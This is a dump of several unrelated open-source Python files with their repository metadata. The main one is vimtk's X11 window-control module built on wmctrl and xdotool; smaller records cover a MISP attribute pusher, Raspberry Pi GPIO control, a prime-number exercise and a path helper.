FIXME\n import ubelt as ub # pip install me! 
https://github.com/Erotemic/ubelt\n import platform\n from os.path import basename\n import re\n computer_name = platform.node()\n dname = basename(dpath)\n if not ub.find_exe('wmctrl'):\n raise Exception('wmctrl must be installed')\n\n for line in ub.cmd('wmctrl -lxp')['out'].splitlines():\n parts = re.split(' +', line)\n if len(parts) > 3 and parts[3] == 'nautilus.Nautilus':\n if parts[4] == computer_name:\n # FIXME: Might be a False positive!\n line_dname = ' '.join(parts[5:])\n if line_dname == dname:\n return True\n # Always correctly returns False\n return False\n\n\ndef wmctrl_list():\n lines = ub.cmd('wmctrl -lxp')['out']\n windows = {}\n for line in lines.split('\\n'):\n if line:\n parts = re.split(' +', line)\n hexid, deskid, pid, wm_class, client = parts[0:5]\n title = ' '.join(parts[5:])\n wm_id = int(hexid, 16)\n windows[wm_id] = {\n 'hexid': hexid,\n 'wm_id': wm_id,\n 'deskid': deskid,\n 'pid': int(pid),\n 'wm_class': wm_class,\n 'client': client,\n 'title': title,\n }\n return windows\n\n\ndef windows_in_order():\n \"\"\"\n CommandLine:\n python -m vimtk.xctrl windows_in_order\n\n References:\n https://stackoverflow.com/questions/15638885/linux-how-to-get-a-list-of-all-visible-windows\n\n Example:\n >>> # xdoctest: +REQUIRES(env:DISPLAY)\n >>> from vimtk.xctrl import *\n >>> result = list(windows_in_order())\n >>> for win in result:\n ... if win.visible():\n ... print(win)\n\n Ignore:\n # Why is this slow somtimes?\n import subprocess\n subprocess.call(['xprop', '-root'])\n\n proc = subprocess.Popen(['xprop', '-root'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, bufsize=1, text=True)\n out, err = proc.communicate()\n\n proc = subprocess.Popen('xprop -root', shell=True, stdout=subprocess.PIPE, bufsize=1)\n info = ub.cmd('xprop -root | grep \"^_NET_CLIENT_LIST_STACKING\"', shell=True)\n info = ub.cmd('xprop -root _NET_CLIENT_LIST_STACKING', shell=True)\n\n info = ub.cmd('xprop -root _NET_CLIENT_LIST_STACKING')\n\n # I don't understand why this can be fast sometimes and slow others\n\n import subprocess\n import timerit\n import itertools as it\n import ubelt as ub\n options = {\n 'bufsize': [-1, 0],\n 'shell': [True, False],\n 'stdout': [subprocess.PIPE, None],\n 'stderr': [subprocess.PIPE, None],\n 'stdin': [subprocess.PIPE, None],\n 'universal_newlines': [True, False],\n # 'cwd': [None, '.']\n # 'env': [None, {}]\n }\n ti = timerit.Timerit(3, bestof=1, verbose=3)\n for vals in it.product(*options.values()):\n opt = ub.dzip(options.keys(), vals)\n command = ['xprop', '-root', '_NET_CLIENT_LIST_STACKING']\n name = ub.repr2(opt, explicit=True, nobr=1, nl=0, itemsep='')\n if opt['shell']:\n command = ' '.join(command)\n for timer in ti.reset(name):\n with timer:\n proc = subprocess.Popen(command, **opt)\n out, err = proc.communicate()\n assert proc.returncode == 0\n # print(out)\n\n for timer in ti.reset('ubelt'):\n with timer:\n print(ub.cmd('xprop -root _NET_CLIENT_LIST_STACKING')['out'])\n\n print(ub.repr2(ub.sorted_vals(ti.measures['mean']), nl=1, precision=6))\n proc = subprocess.Popen('xprop -root', shell=True, stdout=subprocess.PIPE, bufsize=0)\n out, err = proc.communicate()\n info = ub.cmd('xprop -root', verbose=3, shell=True)\n ub.cmd('wmctrl -lxp')['out']\n os.system('wmctrl -lxp')\n \"\"\"\n # info = XCtrl.cmd('xprop -root')\n info = XCtrl.cmd('xprop -root _NET_CLIENT_LIST_STACKING')\n\n lines = [line for line in info['out'].split('\\n')\n if line.startswith('_NET_CLIENT_LIST_STACKING')]\n assert len(lines) == 1, str(lines)\n winid_order_str = lines[0]\n 
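# NOTE (annotation): the xprop output typically looks like\n    #   _NET_CLIENT_LIST_STACKING(WINDOW): window id # 0x3a00004, 0x3c00002, ...\n    # and lists windows in bottom-to-top stacking order, which is why the parsing below\n    # splits on '#' and reverses the list to put the most recently used window first.\n    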
winid_order = winid_order_str.split('#')[1].strip().split(', ')[::-1]\n    winid_order = [int(h, 16) for h in winid_order]\n\n    windows = wmctrl_list()\n\n    for wm_id in winid_order:\n        info = windows[wm_id]\n        yield XWindow(wm_id, info)\n\n\ndef find_windows(proc=None, title=None, visible=True):\n    \"\"\"\n    CommandLine:\n        python -m vimtk.xctrl find_windows\n\n    Example:\n        >>> # xdoctest: +REQUIRES(env:DISPLAY)\n        >>> from vimtk.xctrl import * # NOQA\n        >>> for win in find_windows('gvim'):\n        >>>     print(ub.repr2(win.info()))\n        >>> for win in find_windows('terminator'):\n        >>>     print(ub.repr2(win.info()))\n    \"\"\"\n    import re\n    for win in windows_in_order():\n        flag = True\n        if proc:\n            try:\n                proc_name = win.process_name()\n                flag &= bool(re.match(proc, proc_name))\n            except Exception:\n                flag = False\n        if title:\n            try:\n                win_title = win.title()\n                flag &= bool(re.match(title, win_title))\n            except Exception:\n                flag = False\n        if visible:\n            try:\n                flag &= win.visible()\n            except Exception:\n                flag = False\n        if flag:\n            yield win\n\n\nclass XWindow(ub.NiceRepr):\n    \"\"\"\n    TODO: make API consistent with the win32 version\n    \"\"\"\n\n    def __init__(self, wm_id, info=None, sleeptime=0.01):\n        self.wm_id = wm_id\n        self.cache = info\n        self.sleeptime = 0.01\n\n    @classmethod\n    def find(XWindow, pattern, method='mru'):\n        wm_id = XCtrl.find_window_id(pattern, method=method)\n        self = XWindow(wm_id)\n        return self\n\n    @classmethod\n    def current(XWindow):\n        r\"\"\"\n        CommandLine:\n            VIMTK_TEST=1 xdoctest -m vimtk.xctrl XWindow.current\n\n        Example:\n            >>> # xdoctest: +REQUIRES(env:VIMTK_TEST)\n            >>> from vimtk.xctrl import * # NOQA\n            >>> self = XWindow.current()\n            >>> print('self: XWindow = {}'.format(ub.urepr(self, nl=1)))\n            >>> print('info = ' + ub.repr2(self.wininfo()))\n        \"\"\"\n        wm_id = int(ub.cmd('xdotool getwindowfocus')['out'].strip())\n        win = XWindow(wm_id)\n        return win\n\n    def _wmquery(self, key):\n        if self.cache:\n            return self.cache[key]\n        windows = wmctrl_list()\n        info = windows[self.wm_id]\n        self.cache = info\n        return info[key]\n\n    @property\n    def hexid(self):\n        return hex(self.wm_id)\n\n    def title(self):\n        return self._wmquery('title')\n\n    def visible(self):\n        \"\"\" Basically true for wmctrl (afaik) \"\"\"\n        return True\n\n    def __nice__(self):\n        try:\n            fname = self.process_name()\n        except Exception:\n            fname = '<error: unable to get process name>'\n        return str(self.wm_id) + ' ' + fname + ' ' + repr(self.title())\n\n    def wm_class(self):\n        return self._wmquery('wm_class')\n\n    def process(self):\n        import psutil\n        pid = self._wmquery('pid')\n        proc = psutil.Process(pid)\n        return proc\n\n    def size(self):\n        # Get the current size\n        info = self.wininfo()\n        w, h = int(info['Width']), int(info['Height'])\n        dsize = (w, h)\n        return dsize\n\n    def resize(self, width, height):\n        \"\"\"\n\n        CommandLine:\n            VIMTK_TEST=1 xdoctest -m vimtk.xctrl XWindow.resize\n\n        Example:\n            >>> # xdoctest: +REQUIRES(env:VIMTK_TEST)\n            >>> from vimtk.xctrl import * # NOQA\n            >>> self = XWindow.current()\n            >>> w, h = self.size()\n            >>> self.resize(w + 10, h + 10)\n        \"\"\"\n        command = f'xdotool windowsize {self.wm_id} {width} {height}'\n        ub.cmd(command, verbose=3)\n\n    def wininfo(self):\n        \"\"\"\n        Parse ``xwininfo`` output into a dict of window properties.\n        \"\"\"\n        cmdinfo = ub.cmd('xwininfo -id {}'.format(self.wm_id))\n        if cmdinfo['ret'] != 0:\n            print('info = {}'.format(ub.urepr(cmdinfo, nl=1)))\n            raise Exception(cmdinfo['ret'])\n        out = cmdinfo['out']\n        info = {}\n        curr_key = None\n        val_accum = []\n        # Parse key/val lines\n        def accept(info, curr_key, val_accum):\n            if curr_key is not None:\n                info[curr_key] = (' 
'.join(val_accum)).strip()\n val_accum.clear()\n for line in out.split('\\n'):\n if ':' in line:\n accept(info, curr_key, val_accum)\n key, val = line.split(':', 1)\n val_accum.append(val)\n curr_key = key.strip()\n else:\n val_accum.append(line)\n accept(info, curr_key, val_accum)\n return info\n\n def process_name(self):\n proc = self.process()\n return proc.name()\n\n def focus(self, sleeptime=None):\n ub.cmd('wmctrl -ia {}'.format(self.hexid))\n time.sleep(sleeptime if sleeptime is not None else self.sleeptime)\n\n def info(self):\n info = self.cache.copy()\n info['proc_name'] = self.process_name()\n return info\n\n def move(self, bbox):\n \"\"\"\n CommandLine:\n # List windows\n wmctrl -l\n # List desktops\n wmctrl -d\n\n # Window info\n xwininfo -id 60817412\n\n python -m vimtk.xctrl XWindow.move joncrall 0+1920,680,400,600,400\n python -m vimtk.xctrl XWindow.move joncrall [0,0,1000,1000]\n python -m vimtk.xctrl XWindow.move GVIM special2\n python -m vimtk.xctrl XWindow.move joncrall special2\n python -m vimtk.xctrl XWindow.move x-terminal-emulator.X-terminal-emulator [0,0,1000,1000]\n CommandLine:\n python -m vimtk.xctrl XWindow.move\n\n CommandLine:\n python -m vimtk.xctrl XCtrl.move_window\n\n Example:\n >>> # xdoctest: +SKIP\n >>> XCtrl.move_window('joncrall', '[0,0,1000,1000]')\n\n Ignore:\n # >>> orig_window = []\n # >>> X = xctrl.XCtrl\n win_key = 'x-terminal-emulator.X-terminal-emulator'\n win_id = X.findall_window_ids(key)[0]\n\n python -m xctrl XCtrl.findall_window_ids gvim\n\n \"\"\"\n monitor_infos = {\n i + 1: cplat.get_resolution_info(i)\n for i in range(2)\n }\n # TODO: cut out borders\n # TODO: fix screeninfo monitor offsets\n # TODO: dynamic num screens\n def rel_to_abs_bbox(m, x, y, w, h):\n \"\"\" monitor_num, relative x, y, w, h \"\"\"\n minfo = monitor_infos[m]\n # print('minfo(%d) = %s' % (m, ub.repr2(minfo),))\n mx, my = minfo['off_x'], minfo['off_y']\n mw, mh = minfo['pixels_w'], minfo['pixels_h']\n # Transform to the absolution position\n abs_x = (x * mw) + mx\n abs_y = (y * mh) + my\n abs_w = (w * mw)\n abs_h = (h * mh)\n abs_bbox = [abs_x, abs_y, abs_w, abs_h]\n abs_bbox = ','.join(map(str, map(int, abs_bbox)))\n return abs_bbox\n\n if self.title().startswith('joncrall') and bbox == 'special2':\n # Specify the relative position\n abs_bbox = rel_to_abs_bbox(m=2,\n x=0.0, y=0.7,\n w=1.0, h=0.3)\n elif self.title().startswith('GVIM') and bbox == 'special2':\n # Specify the relative position\n abs_bbox = rel_to_abs_bbox(m=2,\n x=0.0, y=0.0,\n w=1.0, h=0.7)\n else:\n abs_bbox = ','.join(map(str, eval(bbox)))\n\n print('MOVING: win_key = %r' % (self.title(),))\n print('TO: abs_bbox = %r' % (abs_bbox,))\n # abs_bbox.replace('[', '').replace(']', '')\n # get = lambda cmd: XCtrl.cmd(' '.join([\"/bin/bash\", \"-c\", cmd]))['out'] # NOQA\n win_id = XCtrl.find_window_id(self.title(), error='raise')\n print('MOVING: win_id = %r' % (win_id,))\n fmtdict = locals()\n cmd_list = [\n (\"wmctrl -ir {win_id} -b remove,maximized_horz\".format(**fmtdict)),\n (\"wmctrl -ir {win_id} -b remove,maximized_vert\".format(**fmtdict)),\n (\"wmctrl -ir {win_id} -e 0,{abs_bbox}\".format(**fmtdict)),\n ]\n print('\\n'.join(cmd_list))\n for cmd in cmd_list:\n XCtrl.cmd(cmd)\n\n\ndef _wmctrl_terminal_patterns():\n \"\"\"\n wmctrl patterns associated with common terminals\n \"\"\"\n terminal_pattern = r'|'.join([\n 'terminal',\n re.escape('terminator.Terminator'), # gtk3 terminator\n re.escape('x-terminal-emulator.X-terminal-emulator'), # gtk2 terminator\n # other common terminal 
applications\n 'tilix',\n 'konsole',\n 'rxvt',\n 'terminology',\n 'xterm',\n 'tilda',\n 'Yakuake',\n ])\n return terminal_pattern\n\n\nclass XCtrl(object):\n r\"\"\"\n xdotool key ctrl+shift+i\n\n References:\n http://superuser.com/questions/382616/detecting-currently-active-window\n http://askubuntu.com/questions/455762/xbindkeys-wont-work-properly\n\n Ignore:\n xdotool keyup --window 0 7 type --clearmodifiers ---window 0 '%paste'\n\n # List current windows:\n wmctrl -l\n\n # Get current window\n xdotool getwindowfocus getwindowname\n\n\n #====\n # Get last opened window\n #====\n\n win_title=x-terminal-emulator.X-terminal-emulator\n key_ = 'x-terminal-emulator.X-terminal-emulator'\n\n # Get all windows in current workspace\n workspace_number=`wmctrl -d | grep '\\*' | cut -d' ' -f 1`\n win_list=`wmctrl -lx | grep $win_title | grep \" $workspace_number \" | awk '{print $1}'`\n\n # Get stacking order of windows in current workspace\n win_order=$(xprop -root|grep \"^_NET_CLIENT_LIST_STACKING\" | tr \",\" \" \")\n echo $win_order\n\n CommandLine:\n python -m vimtk.xctrl XCtrl:0\n\n Example:\n >>> # xdoctest: +SKIP\n >>> # Script\n >>> orig_window = []\n >>> copy_text_to_clipboard(lorium_ipsum())\n >>> doscript = [\n >>> ('focus', 'x-terminal-emulator.X-terminal-emulator'),\n >>> ('type', '%paste'),\n >>> ('key', 'KP_Enter'),\n >>> # ('focus', 'GVIM')\n >>> ]\n >>> XCtrl.do(*doscript, sleeptime=.01)\n\n Ignore:\n >>> # xdoctest: +SKIP\n >>> copy_text_to_clipboard(text)\n >>> if '\\n' in text or len(text) > 20:\n >>> text = '\\'%paste\\''\n >>> else:\n >>> import pipes\n >>> text = pipes.quote(text.lstrip(' '))\n >>> ('focus', 'GVIM'),\n >>> #\n >>> doscript = [\n >>> ('focus', 'x-terminal-emulator.X-terminal-emulator'),\n >>> ('type', text),\n >>> ('key', 'KP_Enter'),\n >>> ]\n >>> XCtrl.do(*doscript, sleeptime=.01)\n\n \"\"\"\n # @staticmethod\n # def send_raw_key_input(keys):\n # print('send key input: %r' % (keys,))\n # args = ['xdotool', 'type', keys]\n # XCtrl.cmd(*args, quiet=True, silence=True)\n\n @classmethod\n def cmd(XCtrl, command):\n logging.debug('[cmd] {}'.format(command))\n info = ub.cmd(command)\n if info['ret'] != 0:\n logging.warn('Something went wrong {}'.format(ub.repr2(info)))\n return info\n\n @classmethod\n def findall_window_ids(XCtrl, pattern):\n \"\"\"\n CommandLine:\n python -m vimtk.xctrl XCtrl.findall_window_ids --pat=gvim\n python -m vimtk.xctrl XCtrl.findall_window_ids --pat=gvim\n python -m vimtk.xctrl XCtrl.findall_window_ids --pat=joncrall\n\n Example:\n >>> # xdoctest: +SKIP\n >>> pattern = ub.argval('--pat')\n >>> winid_list = XCtrl.findall_window_ids(pattern)\n >>> print('winid_list = {!r}'.format(winid_list))\n\n Ignore:\n wmctrl -l\n xprop -id\n wmctrl -l | awk '{print $1}' | xprop -id\n 0x00a00007 | grep \"WM_CLASS(STRING)\"\n \"\"\"\n # List all windows and their identifiers\n info = XCtrl.cmd('wmctrl -lx')\n lines = info['out'].split('\\n')\n # Find windows with identifiers matching the pattern\n lines = [line for line in lines if re.search(pattern, line)]\n # Get the hex-id portion of the output\n winid_list = [line.split()[0] for line in lines]\n winid_list = [int(h, 16) for h in winid_list if h]\n return winid_list\n\n @classmethod\n def sort_window_ids(XCtrl, winid_list, order='mru'):\n \"\"\"\n Orders window ids by most recently used\n \"\"\"\n def isect(list1, list2):\n set2 = set(list2)\n return [item for item in list1 if item in set2]\n\n winid_order = XCtrl.sorted_window_ids(order)\n sorted_win_ids = isect(winid_order, winid_list)\n return 
sorted_win_ids\n\n @staticmethod\n def killold(pattern, num=4):\n \"\"\"\n Leaves no more than `num` instances of a program alive. Ordering is\n determined by most recent usage.\n\n CommandLine:\n python -m vimtk.xctrl XCtrl.killold gvim 2\n\n Example:\n >>> # xdoctest: +SKIP\n >>> XCtrl = xctrl.XCtrl\n >>> pattern = 'gvim'\n >>> num = 2\n \"\"\"\n import psutil\n num = int(num)\n winid_list = XCtrl.findall_window_ids(pattern)\n winid_list = XCtrl.sort_window_ids(winid_list, 'mru')[num:]\n\n info = XCtrl.cmd('wmctrl -lxp')\n lines = info['out'].split('\\n')\n lines = [' '.join(list(ub.take(line.split(), [0, 2])))\n for line in lines]\n output_lines = lines\n # output_lines = XCtrl.cmd(\n # \"\"\"wmctrl -lxp | awk '{print $1 \" \" $3}'\"\"\",\n # **cmdkw)['out'].strip().split('\\n')\n output_fields = [line.split(' ') for line in output_lines]\n output_fields = [(int(wid, 16), int(pid)) for wid, pid in output_fields]\n pid_list = [pid for wid, pid in output_fields if wid in winid_list]\n for pid in pid_list:\n proc = psutil.Process(pid=pid)\n proc.kill()\n\n @staticmethod\n def sorted_window_ids(order='mru'):\n \"\"\"\n Returns window ids orderd by criteria\n default is mru (most recently used)\n\n CommandLine:\n xprop -root | grep \"^_NET_CLIENT_LIST_STACKING\" | tr \",\" \" \"\n python -m vimtk.xctrl XCtrl.sorted_window_ids\n\n CommandLine:\n python -m vimtk.xctrl XCtrl.sorted_window_ids\n\n Example:\n >>> # xdoctest: +SKIP\n >>> winid_order = XCtrl.sorted_window_ids()\n >>> print('winid_order = {!r}'.format(winid_order))\n \"\"\"\n info = XCtrl.cmd('xprop -root')\n lines = [line for line in info['out'].split('\\n')\n if line.startswith('_NET_CLIENT_LIST_STACKING')]\n assert len(lines) == 1, str(lines)\n winid_order_str = lines[0]\n winid_order = winid_order_str.split('#')[1].strip().split(', ')[::-1]\n winid_order = [int(h, 16) for h in winid_order]\n if order == 'lru':\n winid_order = winid_order[::-1]\n elif order == 'mru':\n winid_order = winid_order\n else:\n raise NotImplementedError(order)\n return winid_order\n\n @staticmethod\n def find_window_id(pattern, method='mru', error='raise'):\n \"\"\"\n xprop -id 0x00a00007 | grep \"WM_CLASS(STRING)\"\n \"\"\"\n logging.debug('Find window id pattern={}, method={}'.format(pattern, method))\n winid_candidates = XCtrl.findall_window_ids(pattern)\n if len(winid_candidates) == 0:\n if error == 'raise':\n available_windows = XCtrl.cmd('wmctrl -lx')['out']\n msg = 'No window matches pattern=%r' % (pattern,)\n msg += '\\navailable windows are:\\n%s' % (available_windows,)\n logger.error(msg)\n raise Exception(msg)\n win_id = None\n elif len(winid_candidates) == 1:\n win_id = winid_candidates[0]\n else:\n # print('Multiple (%d) windows matches pattern=%r' % (\n # len(winid_list), pattern,))\n # Find most recently used window with the focus name.\n win_id = XCtrl.sort_window_ids(winid_candidates, method)[0]\n return win_id\n\n @staticmethod\n def current_gvim_edit(op='e', fpath=''):\n r\"\"\"\n CommandLine:\n python -m vimtk.xctrl XCtrl.current_gvim_edit sp ~/.bashrc\n \"\"\"\n fpath = ub.shrinkuser(ub.truepath(fpath))\n # print('fpath = %r' % (fpath,))\n cplat.copy_text_to_clipboard(fpath)\n doscript = [\n ('focus', 'gvim'),\n ('key', 'Escape'),\n ('type2', ';' + op + ' ' + fpath),\n # ('type2', ';' + op + ' '),\n # ('key', 'ctrl+v'),\n ('key', 'KP_Enter'),\n ]\n XCtrl.do(*doscript, verbose=0, sleeptime=.001)\n\n @staticmethod\n def copy_gvim_to_terminal_script(text, return_to_win=\"1\", verbose=0, sleeptime=.02):\n \"\"\"\n 
vimtk.xctrl.XCtrl.copy_gvim_to_terminal_script('print(\"hi\")', verbose=1)\n python -m vimtk.xctrl XCtrl.copy_gvim_to_terminal_script \"echo hi\" 1 1\n\n If this doesn't work make sure pyperclip is installed and set to xsel\n\n print('foobar')\n echo hi\n \"\"\"\n # Prepare to send text to xdotool\n cplat.copy_text_to_clipboard(text)\n\n if verbose:\n print('text = %r' % (text,))\n print(cplat.get_clipboard())\n\n terminal_pattern = r'\\|'.join([\n 'terminal',\n re.escape('terminator.Terminator'), # gtk3 terminator\n re.escape('x-terminal-emulator.X-terminal-emulator'), # gtk2 terminator\n ])\n\n # Build xdtool script\n doscript = [\n ('remember_window_id', 'ACTIVE_WIN'),\n # ('focus', 'x-terminal-emulator.X-terminal-emulator'),\n ('focus', terminal_pattern),\n ('key', 'ctrl+shift+v'),\n ('key', 'KP_Enter'),\n ]\n if '\\n' in text:\n # Press enter twice for multiline texts\n doscript += [\n ('key', 'KP_Enter'),\n ]\n\n if return_to_win == \"1\":\n doscript += [\n ('focus_id', '$ACTIVE_WIN'),\n ]\n # execute script\n # verbose = 1\n XCtrl.do(*doscript, sleeptime=sleeptime, verbose=verbose)\n\n @staticmethod\n def do(*cmd_list, **kwargs):\n \"\"\"\n DEPRICATE THIS\n \"\"\"\n verbose = kwargs.get('verbose', False)\n if verbose:\n print = logger.info\n else:\n print = logger.debug\n\n print('Executing x do: %s' % (ub.repr2(cmd_list),))\n\n # http://askubuntu.com/questions/455762/xbindkeys-wont-work-properly\n # Make things work even if other keys are pressed\n defaultsleep = 0.0\n sleeptime = kwargs.get('sleeptime', defaultsleep)\n time.sleep(.05)\n XCtrl.cmd('xset r off')\n\n memory = {}\n\n for count, item in enumerate(cmd_list):\n # print('item = %r' % (item,))\n sleeptime = kwargs.get('sleeptime', defaultsleep)\n\n assert isinstance(item, tuple)\n assert len(item) >= 2\n xcmd, key_ = item[0:2]\n if len(item) >= 3:\n if isinstance(item[2], six.string_types) and item[2].endswith('?'):\n sleeptime = float(item[2][:-1])\n print('special command sleep')\n print('sleeptime = %r' % (sleeptime,))\n else:\n sleeptime = float(item[2])\n\n args = []\n\n print('# Step %d' % (count,))\n print('xcmd = {!r}'.format(xcmd))\n\n if xcmd == 'focus':\n key_ = str(key_)\n if key_.startswith('$'):\n key_ = memory[key_[1:]]\n pattern = key_\n win_id = XCtrl.find_window_id(pattern, method='mru')\n if win_id is None:\n args = ['wmctrl', '-xa', pattern]\n else:\n args = ['wmctrl', '-ia', hex(win_id)]\n elif xcmd == 'focus_id':\n key_ = str(key_)\n if key_.startswith('$'):\n key_ = memory[key_[1:]]\n args = ['wmctrl', '-ia', hex(key_)]\n elif xcmd == 'remember_window_id':\n memory[key_] = XCtrl.current_window_id()\n continue\n elif xcmd == 'remember_window_name':\n memory[key_] = XCtrl.current_window_name()\n continue\n elif xcmd == 'type':\n args = [\n 'xdotool',\n 'keyup', '--window', '0', '7',\n 'type', '--clearmodifiers',\n '--window', '0', str(key_)\n ]\n elif xcmd == 'type2':\n args = [\n 'xdotool', 'type', pipes.quote(str(key_))\n ]\n elif xcmd == 'xset-r-on':\n args = ['xset', 'r', 'on']\n elif xcmd == 'xset-r-off':\n args = ['xset', 'r', 'off']\n else:\n args = ['xdotool', str(xcmd), str(key_)]\n\n print('args = {!r}'.format(args))\n XCtrl.cmd(args)\n\n if sleeptime > 0:\n time.sleep(sleeptime)\n\n XCtrl.cmd('xset r on')\n\n @staticmethod\n def current_window_id():\n logging.debug('Get current window id')\n info = XCtrl.cmd('xdotool getwindowfocus')\n value = int(info['out'].strip())\n logging.debug('... 
current window id = {}'.format(value))\n        return value\n\n    @staticmethod\n    def current_window_name():\n        logging.debug('Get current window name')\n        info = XCtrl.cmd('xdotool getwindowfocus getwindowname')\n        value = pipes.quote(info['out'].strip())\n        logging.debug('... current window name = {}'.format(value))\n        return value\n\n    @staticmethod\n    def focus_window(winhandle, path=None, name=None, sleeptime=.01):\n        \"\"\"\n        sudo apt-get install xautomation\n        apt-get install autokey-gtk\n\n        wmctrl -xa gnome-terminal.Gnome-terminal\n        wmctrl -xl\n        \"\"\"\n        print('focus: ' + winhandle)\n        args = ['wmctrl', '-xa', winhandle]\n        XCtrl.cmd(args)\n        time.sleep(sleeptime)\n\n    @classmethod\n    def send_keys(XCtrl, key, sleeptime=0.1):\n        args = ['xdotool', 'key', str(key)]\n        XCtrl.cmd(args)\n        time.sleep(sleeptime)\n\n    # @classmethod\n    # def focus(XCtrl, pattern=None, win_id=None, sleeptime=.01):\n    #     \"\"\"\n    #     sudo apt-get install xautomation\n    #     apt-get install autokey-gtk\n\n    #     wmctrl -xa gnome-terminal.Gnome-terminal\n    #     wmctrl -xl\n    #     \"\"\"\n    #     if pattern is not None:\n    #         assert win_id is None\n    #     if win_id is None:\n    #         assert pattern is not None\n    #         win_id = XCtrl.find_window_id(pattern, method='mru')\n\n    #     if win_id is None:\n    #         args = ['wmctrl', '-xa', pattern]\n    #     else:\n    #         args = ['wmctrl', '-ia', hex(win_id)]\n\n    #     XCtrl.cmd(*args, verbose=False)\n    #     time.sleep(sleeptime)\n\n\nif __name__ == '__main__':\n    r\"\"\"\n    CommandLine:\n        export PYTHONPATH=$PYTHONPATH:$HOME/code/vimtk\n        python -m vimtk.xctrl\n    \"\"\"\n    import xdoctest\n    xdoctest.doctest_module(__file__)\n","repo_name":"Erotemic/vimtk","sub_path":"vimtk/xctrl.py","file_name":"xctrl.py","file_ext":"py","file_size_in_byte":28568,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"}
{"seq_id":"14228825336","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pymisp import PyMISP\nfrom pymisp import ExpandedPyMISP\nfrom pymisp import MISPAttribute\nfrom keys import misp_url, misp_key, misp_verifycert\n\nclass Pusher:\n    \"\"\"\n    Class used to push data to MISP instance\n    this is used to push predictions to MISP\n    \"\"\"\n    def __init__(self, Type, Value, Category, Comment, EventId):\n        self.Type = Type\n        self.Value = Value\n        self.Category = Category\n        self.Comment = Comment\n        self.EventId = EventId\n\n        self.attribute = MISPAttribute()\n        self.attribute.type = self.Type\n        self.attribute.value = self.Value\n        self.attribute.category = self.Category\n        self.attribute.comment = self.Comment\n\n    def create_attribute(self):\n        misp = ExpandedPyMISP(misp_url, misp_key, misp_verifycert, debug=True)\n        misp.add_attribute(self.EventId, self.attribute, pythonify=False)\n","repo_name":"BlazedLearning/PhishE","sub_path":"Update_event.py","file_name":"Update_event.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}
{"seq_id":"7774213374","text":"import RPi.GPIO as gpio\nfrom time import sleep\n\n#Defining GPIO pin numbers\npin1 = 7 # This is GPIO6, hence, 5th pin in inner row from ports 41\npin2 = 8 # 8th pin in outer row from ports 42\npin3 = 9 # 9th pin in outer row from ports 39\npin4 = 11 # 10th pin in inner row from ports 40\n\n# Setting up basic GPIO settings\ngpio.setmode(gpio.BCM)\ngpio.setwarnings(False)\ngpio.setup(pin1, gpio.OUT)\ngpio.setup(pin2, gpio.OUT)\ngpio.setup(pin3, gpio.OUT)\ngpio.setup(pin4, gpio.OUT)\n\ndef move_to_cell(index):\n    wait_time = 1\n    if (index == 1):\n        gpio.output(pin1, 1)\n    
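# NOTE (annotation): the branches appear to encode the cell index in binary (pin1=bit0,\n    # pin2=bit1, pin3=bit2), but the index == 6 branch below drives pin1+pin3, which would\n    # encode 5 under that scheme; whether this is intentional is not clear from the source.\n    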
elif (index == 2):\n        gpio.output(pin2, 1)\n    elif (index == 3):\n        gpio.output(pin1, 1)\n        gpio.output(pin2, 1)\n    elif (index == 4):\n        gpio.output(pin3, 1)\n    elif (index == 6):\n        gpio.output(pin1, 1)\n        gpio.output(pin3, 1)\n    sleep(wait_time)\n\ndef reset():\n    gpio.output(pin1, 0)\n    gpio.output(pin2, 0)\n    gpio.output(pin3, 0)\n    gpio.output(pin4, 0)\n    sleep(1)\n","repo_name":"Ridhwanluthra/sem_long","sub_path":"scripts/to_firebird.py","file_name":"to_firebird.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"42930057405","text":"def eh_primo(numero):\n    if numero == 2:\n        return True\n    elif numero < 2:\n        return False\n    elif numero % 2 == 0:\n        return False\n    n = 3 \n    while n< numero:\n        if numero % n == 0:\n            return False\n        n+=2\n    return True\n    \ndef primos_entre(a,b):\n    lista=[0]*(b-a)\n    i=0\n    l=[]\n    while i < len(lista):\n        lista[i] = a+1\n        if eh_primo(lista[i]) == True:\n            l.append(lista[i])\n        i+=1\n        a+=1\n    return l\n    \n    \n    \n    ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_344/ch51_2020_04_13_02_06_28_412421.py","file_name":"ch51_2020_04_13_02_06_28_412421.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"28870075784","text":"import os\n\n\ndef get_abs_path(path_, ref=None):\n    \"\"\" Return an absolute path\n\n    It handles the following formats:\n\n    * ~/things\n    * ../things\n    * things\n    * /path/to/things\n\n    :param path_: path\n    :param ref: reference path to handle relative paths\n    :return: absolute path\n    \"\"\"\n    if path_ is None:\n        return None\n    path = path_\n    if path_.startswith('~'):\n        path = os.path.expanduser(path_)\n    elif not path_.startswith('/'):\n        if ref is not None:\n            prevdir = os.getcwd()\n            try:\n                os.chdir(ref)\n                path = os.path.abspath(path_)\n            finally:\n                os.chdir(prevdir)\n        else:\n            path = os.path.abspath(path_)\n\n    return path[:-1] if path.endswith('/') else path\n","repo_name":"ANSSI-FR/packetweaver","sub_path":"packetweaver/libs/sys/path_handling.py","file_name":"path_handling.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"}
{"seq_id":"32709071536","text":"import Queue\n\nfrom trpycore.pool.queue import QueuePool\n\nclass ESClientPool(QueuePool):\n    \"\"\"ESClient pool.\n\n    Example usage:\n        with pool.get() as es_client:\n            users = es_client.index('users', 'user')\n            users.status()\n    \"\"\"\n    \n    def __init__(self, es_client_factory, size, queue_class=Queue.Queue):\n        \"\"\"ESClientPool constructor.\n\n        Args:\n            es_client_factory: Factory object to create ESClient objects.\n            size: Number of objects to include in pool.\n            queue_class: Optional Queue class. If not provided, will\n                default to Queue.Queue. 
